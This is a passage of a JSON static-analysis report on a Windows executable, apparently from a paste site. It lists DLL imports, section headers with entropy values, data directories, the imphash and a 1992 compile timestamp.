- "name": "PtInRect",
- "address": "0x46f55c"
- },
- {
- "name": "PostQuitMessage",
- "address": "0x46f560"
- },
- {
- "name": "PostMessageA",
- "address": "0x46f564"
- },
- {
- "name": "PeekMessageA",
- "address": "0x46f568"
- },
- {
- "name": "OpenClipboard",
- "address": "0x46f56c"
- },
- {
- "name": "OffsetRect",
- "address": "0x46f570"
- },
- {
- "name": "OemToCharA",
- "address": "0x46f574"
- },
- {
- "name": "MessageBoxA",
- "address": "0x46f578"
- },
- {
- "name": "MessageBeep",
- "address": "0x46f57c"
- },
- {
- "name": "MapWindowPoints",
- "address": "0x46f580"
- },
- {
- "name": "MapVirtualKeyA",
- "address": "0x46f584"
- },
- {
- "name": "LoadStringA",
- "address": "0x46f588"
- },
- {
- "name": "LoadKeyboardLayoutA",
- "address": "0x46f58c"
- },
- {
- "name": "LoadIconA",
- "address": "0x46f590"
- },
- {
- "name": "LoadCursorA",
- "address": "0x46f594"
- },
- {
- "name": "LoadBitmapA",
- "address": "0x46f598"
- },
- {
- "name": "KillTimer",
- "address": "0x46f59c"
- },
- {
- "name": "IsZoomed",
- "address": "0x46f5a0"
- },
- {
- "name": "IsWindowVisible",
- "address": "0x46f5a4"
- },
- {
- "name": "IsWindowEnabled",
- "address": "0x46f5a8"
- },
- {
- "name": "IsWindow",
- "address": "0x46f5ac"
- },
- {
- "name": "IsRectEmpty",
- "address": "0x46f5b0"
- },
- {
- "name": "IsIconic",
- "address": "0x46f5b4"
- },
- {
- "name": "IsDialogMessageA",
- "address": "0x46f5b8"
- },
- {
- "name": "IsChild",
- "address": "0x46f5bc"
- },
- {
- "name": "IsCharAlphaNumericA",
- "address": "0x46f5c0"
- },
- {
- "name": "IsCharAlphaA",
- "address": "0x46f5c4"
- },
- {
- "name": "InvalidateRect",
- "address": "0x46f5c8"
- },
- {
- "name": "IntersectRect",
- "address": "0x46f5cc"
- },
- {
- "name": "InsertMenuItemA",
- "address": "0x46f5d0"
- },
- {
- "name": "InsertMenuA",
- "address": "0x46f5d4"
- },
- {
- "name": "InflateRect",
- "address": "0x46f5d8"
- },
- {
- "name": "GetWindowThreadProcessId",
- "address": "0x46f5dc"
- },
- {
- "name": "GetWindowTextA",
- "address": "0x46f5e0"
- },
- {
- "name": "GetWindowRect",
- "address": "0x46f5e4"
- },
- {
- "name": "GetWindowPlacement",
- "address": "0x46f5e8"
- },
- {
- "name": "GetWindowLongA",
- "address": "0x46f5ec"
- },
- {
- "name": "GetWindowDC",
- "address": "0x46f5f0"
- },
- {
- "name": "GetTopWindow",
- "address": "0x46f5f4"
- },
- {
- "name": "GetSystemMetrics",
- "address": "0x46f5f8"
- },
- {
- "name": "GetSystemMenu",
- "address": "0x46f5fc"
- },
- {
- "name": "GetSysColorBrush",
- "address": "0x46f600"
- },
- {
- "name": "GetSysColor",
- "address": "0x46f604"
- },
- {
- "name": "GetSubMenu",
- "address": "0x46f608"
- },
- {
- "name": "GetScrollRange",
- "address": "0x46f60c"
- },
- {
- "name": "GetScrollPos",
- "address": "0x46f610"
- },
- {
- "name": "GetScrollInfo",
- "address": "0x46f614"
- },
- {
- "name": "GetPropA",
- "address": "0x46f618"
- },
- {
- "name": "GetParent",
- "address": "0x46f61c"
- },
- {
- "name": "GetWindow",
- "address": "0x46f620"
- },
- {
- "name": "GetMessageTime",
- "address": "0x46f624"
- },
- {
- "name": "GetMenuStringA",
- "address": "0x46f628"
- },
- {
- "name": "GetMenuState",
- "address": "0x46f62c"
- },
- {
- "name": "GetMenuItemInfoA",
- "address": "0x46f630"
- },
- {
- "name": "GetMenuItemID",
- "address": "0x46f634"
- },
- {
- "name": "GetMenuItemCount",
- "address": "0x46f638"
- },
- {
- "name": "GetMenu",
- "address": "0x46f63c"
- },
- {
- "name": "GetLastActivePopup",
- "address": "0x46f640"
- },
- {
- "name": "GetKeyboardState",
- "address": "0x46f644"
- },
- {
- "name": "GetKeyboardLayoutList",
- "address": "0x46f648"
- },
- {
- "name": "GetKeyboardLayout",
- "address": "0x46f64c"
- },
- {
- "name": "GetKeyState",
- "address": "0x46f650"
- },
- {
- "name": "GetKeyNameTextA",
- "address": "0x46f654"
- },
- {
- "name": "GetIconInfo",
- "address": "0x46f658"
- },
- {
- "name": "GetForegroundWindow",
- "address": "0x46f65c"
- },
- {
- "name": "GetFocus",
- "address": "0x46f660"
- },
- {
- "name": "GetDesktopWindow",
- "address": "0x46f664"
- },
- {
- "name": "GetDCEx",
- "address": "0x46f668"
- },
- {
- "name": "GetDC",
- "address": "0x46f66c"
- },
- {
- "name": "GetCursorPos",
- "address": "0x46f670"
- },
- {
- "name": "GetCursor",
- "address": "0x46f674"
- },
- {
- "name": "GetClipboardData",
- "address": "0x46f678"
- },
- {
- "name": "GetClientRect",
- "address": "0x46f67c"
- },
- {
- "name": "GetClassNameA",
- "address": "0x46f680"
- },
- {
- "name": "GetClassInfoA",
- "address": "0x46f684"
- },
- {
- "name": "GetCapture",
- "address": "0x46f688"
- },
- {
- "name": "GetActiveWindow",
- "address": "0x46f68c"
- },
- {
- "name": "FrameRect",
- "address": "0x46f690"
- },
- {
- "name": "FindWindowA",
- "address": "0x46f694"
- },
- {
- "name": "FillRect",
- "address": "0x46f698"
- },
- {
- "name": "EqualRect",
- "address": "0x46f69c"
- },
- {
- "name": "EnumWindows",
- "address": "0x46f6a0"
- },
- {
- "name": "EnumThreadWindows",
- "address": "0x46f6a4"
- },
- {
- "name": "EnumClipboardFormats",
- "address": "0x46f6a8"
- },
- {
- "name": "EndPaint",
- "address": "0x46f6ac"
- },
- {
- "name": "EndDeferWindowPos",
- "address": "0x46f6b0"
- },
- {
- "name": "EnableWindow",
- "address": "0x46f6b4"
- },
- {
- "name": "EnableScrollBar",
- "address": "0x46f6b8"
- },
- {
- "name": "EnableMenuItem",
- "address": "0x46f6bc"
- },
- {
- "name": "EmptyClipboard",
- "address": "0x46f6c0"
- },
- {
- "name": "DrawTextA",
- "address": "0x46f6c4"
- },
- {
- "name": "DrawMenuBar",
- "address": "0x46f6c8"
- },
- {
- "name": "DrawIconEx",
- "address": "0x46f6cc"
- },
- {
- "name": "DrawIcon",
- "address": "0x46f6d0"
- },
- {
- "name": "DrawFrameControl",
- "address": "0x46f6d4"
- },
- {
- "name": "DrawEdge",
- "address": "0x46f6d8"
- },
- {
- "name": "DispatchMessageA",
- "address": "0x46f6dc"
- },
- {
- "name": "DestroyWindow",
- "address": "0x46f6e0"
- },
- {
- "name": "DestroyMenu",
- "address": "0x46f6e4"
- },
- {
- "name": "DestroyIcon",
- "address": "0x46f6e8"
- },
- {
- "name": "DestroyCursor",
- "address": "0x46f6ec"
- },
- {
- "name": "DeleteMenu",
- "address": "0x46f6f0"
- },
- {
- "name": "DeferWindowPos",
- "address": "0x46f6f4"
- },
- {
- "name": "DefWindowProcA",
- "address": "0x46f6f8"
- },
- {
- "name": "DefMDIChildProcA",
- "address": "0x46f6fc"
- },
- {
- "name": "DefFrameProcA",
- "address": "0x46f700"
- },
- {
- "name": "CreatePopupMenu",
- "address": "0x46f704"
- },
- {
- "name": "CreateMenu",
- "address": "0x46f708"
- },
- {
- "name": "CreateIcon",
- "address": "0x46f70c"
- },
- {
- "name": "CloseClipboard",
- "address": "0x46f710"
- },
- {
- "name": "ClientToScreen",
- "address": "0x46f714"
- },
- {
- "name": "CheckMenuItem",
- "address": "0x46f718"
- },
- {
- "name": "CallWindowProcA",
- "address": "0x46f71c"
- },
- {
- "name": "CallNextHookEx",
- "address": "0x46f720"
- },
- {
- "name": "BeginPaint",
- "address": "0x46f724"
- },
- {
- "name": "BeginDeferWindowPos",
- "address": "0x46f728"
- },
- {
- "name": "CharNextA",
- "address": "0x46f72c"
- },
- {
- "name": "CharLowerBuffA",
- "address": "0x46f730"
- },
- {
- "name": "CharLowerA",
- "address": "0x46f734"
- },
- {
- "name": "CharUpperBuffA",
- "address": "0x46f738"
- },
- {
- "name": "CharToOemA",
- "address": "0x46f73c"
- },
- {
- "name": "AdjustWindowRectEx",
- "address": "0x46f740"
- },
- {
- "name": "ActivateKeyboardLayout",
- "address": "0x46f744"
- }
- ],
- "dll": "user32.dll"
- },
- {
- "imports": [
- {
- "name": "Sleep",
- "address": "0x46f74c"
- }
- ],
- "dll": "kernel32.dll"
- },
- {
- "imports": [
- {
- "name": "SafeArrayPtrOfIndex",
- "address": "0x46f754"
- },
- {
- "name": "SafeArrayGetUBound",
- "address": "0x46f758"
- },
- {
- "name": "SafeArrayGetLBound",
- "address": "0x46f75c"
- },
- {
- "name": "SafeArrayCreate",
- "address": "0x46f760"
- },
- {
- "name": "VariantChangeType",
- "address": "0x46f764"
- },
- {
- "name": "VariantCopy",
- "address": "0x46f768"
- },
- {
- "name": "VariantClear",
- "address": "0x46f76c"
- },
- {
- "name": "VariantInit",
- "address": "0x46f770"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "CreateStreamOnHGlobal",
- "address": "0x46f778"
- },
- {
- "name": "IsAccelerator",
- "address": "0x46f77c"
- },
- {
- "name": "OleDraw",
- "address": "0x46f780"
- },
- {
- "name": "OleSetMenuDescriptor",
- "address": "0x46f784"
- },
- {
- "name": "CoTaskMemFree",
- "address": "0x46f788"
- },
- {
- "name": "ProgIDFromCLSID",
- "address": "0x46f78c"
- },
- {
- "name": "StringFromCLSID",
- "address": "0x46f790"
- },
- {
- "name": "CoCreateInstance",
- "address": "0x46f794"
- },
- {
- "name": "CoGetClassObject",
- "address": "0x46f798"
- },
- {
- "name": "CoUninitialize",
- "address": "0x46f79c"
- },
- {
- "name": "CoInitialize",
- "address": "0x46f7a0"
- },
- {
- "name": "IsEqualGUID",
- "address": "0x46f7a4"
- }
- ],
- "dll": "ole32.dll"
- },
- {
- "imports": [
- {
- "name": "GetErrorInfo",
- "address": "0x46f7ac"
- },
- {
- "name": "GetActiveObject",
- "address": "0x46f7b0"
- },
- {
- "name": "SysFreeString",
- "address": "0x46f7b4"
- }
- ],
- "dll": "oleaut32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_SetIconSize",
- "address": "0x46f7bc"
- },
- {
- "name": "ImageList_GetIconSize",
- "address": "0x46f7c0"
- },
- {
- "name": "ImageList_Write",
- "address": "0x46f7c4"
- },
- {
- "name": "ImageList_Read",
- "address": "0x46f7c8"
- },
- {
- "name": "ImageList_GetDragImage",
- "address": "0x46f7cc"
- },
- {
- "name": "ImageList_DragShowNolock",
- "address": "0x46f7d0"
- },
- {
- "name": "ImageList_SetDragCursorImage",
- "address": "0x46f7d4"
- },
- {
- "name": "ImageList_DragMove",
- "address": "0x46f7d8"
- },
- {
- "name": "ImageList_DragLeave",
- "address": "0x46f7dc"
- },
- {
- "name": "ImageList_DragEnter",
- "address": "0x46f7e0"
- },
- {
- "name": "ImageList_EndDrag",
- "address": "0x46f7e4"
- },
- {
- "name": "ImageList_BeginDrag",
- "address": "0x46f7e8"
- },
- {
- "name": "ImageList_Remove",
- "address": "0x46f7ec"
- },
- {
- "name": "ImageList_DrawEx",
- "address": "0x46f7f0"
- },
- {
- "name": "ImageList_Draw",
- "address": "0x46f7f4"
- },
- {
- "name": "ImageList_GetBkColor",
- "address": "0x46f7f8"
- },
- {
- "name": "ImageList_SetBkColor",
- "address": "0x46f7fc"
- },
- {
- "name": "ImageList_ReplaceIcon",
- "address": "0x46f800"
- },
- {
- "name": "ImageList_Add",
- "address": "0x46f804"
- },
- {
- "name": "ImageList_GetImageCount",
- "address": "0x46f808"
- },
- {
- "name": "ImageList_Destroy",
- "address": "0x46f80c"
- },
- {
- "name": "ImageList_Create",
- "address": "0x46f810"
- }
- ],
- "dll": "comctl32.dll"
- },
- {
- "imports": [
- {
- "name": "OpenPrinterA",
- "address": "0x46f818"
- },
- {
- "name": "EnumPrintersA",
- "address": "0x46f81c"
- },
- {
- "name": "DocumentPropertiesA",
- "address": "0x46f820"
- },
- {
- "name": "ClosePrinter",
- "address": "0x46f824"
- }
- ],
- "dll": "winspool.drv"
- },
- {
- "imports": [
- {
- "name": "PrintDlgA",
- "address": "0x46f82c"
- }
- ],
- "dll": "comdlg32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0009ba71",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00000000",
- "icon_hash": null,
- "entrypoint": "0x0046304c",
- "timestamp": "1992-03-02 14:59:08",
- "osversion": "4.0",
- "sections": [
- {
- "name": "CODE",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00062200",
- "entropy": "6.54",
- "raw_address": "0x00000400",
- "virtual_size": "0x00062094",
- "characteristics_raw": "0x60000020"
- },
- {
- "name": "DATA",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00064000",
- "size_of_data": "0x00009600",
- "entropy": "4.97",
- "raw_address": "0x00062600",
- "virtual_size": "0x00009528",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": "BSS",
- "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0006e000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x0006bc00",
- "virtual_size": "0x00000d59",
- "characteristics_raw": "0xc0000000"
- },
- {
- "name": ".idata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0006f000",
- "size_of_data": "0x00002600",
- "entropy": "5.01",
- "raw_address": "0x0006bc00",
- "virtual_size": "0x00002540",
- "characteristics_raw": "0xc0000040"
- },
- {
- "name": ".tls",
- "characteristics": "IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00072000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x0006e200",
- "virtual_size": "0x00000010",
- "characteristics_raw": "0xc0000000"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00073000",
- "size_of_data": "0x00000200",
- "entropy": "0.21",
- "raw_address": "0x0006e200",
- "virtual_size": "0x00000018",
- "characteristics_raw": "0x50000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00074000",
- "size_of_data": "0x00007200",
- "entropy": "6.67",
- "raw_address": "0x0006e400",
- "virtual_size": "0x00007108",
- "characteristics_raw": "0x50000040"
- },
- {
- "name": ".rsrc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0007c000",
- "size_of_data": "0x00025c00",
- "entropy": "7.08",
- "raw_address": "0x00075600",
- "virtual_size": "0x00025b70",
- "characteristics_raw": "0x50000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0006f000",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x00002540"
- },
- {
- "virtual_address": "0x0007c000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00025b70"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00074000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00007108"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00073000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000018"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "46116a2f8090728368dbf9ef96584273",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 17,
- "versioninfo": []
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement